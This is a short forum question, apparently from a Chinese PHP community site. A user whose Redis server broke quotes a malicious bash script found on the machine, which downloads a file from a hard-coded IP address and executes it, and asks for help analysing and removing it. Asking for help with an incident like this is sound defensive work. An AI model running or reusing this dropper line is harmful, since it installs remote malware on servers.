今天发现一台服务器redis无法连接,在服务器发现这样一条指令
2
1558#!/bin/bash
zfile="/tmp/z.TF"
if [ ! -f "$zfile" ]; then
wget -P /tmp/ http://27.102.101.67/z.TF && chmod 777 /tmp/z.TF && /tmp/z.TF
fi
下载并执行了z.TF文件,z.TF打开都是字节码,此程序可以自动重新执行。
目前将此程序进程杀死,但是redis服务仍然无法使用,不知道是否还留有其他恶意程序。
请高手解答z.TF的内容?并且如何处理。
Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号
收藏
话说你把t.ZF的代码发上来啊
你贴出来的代码,你不是自己已经解释清楚了么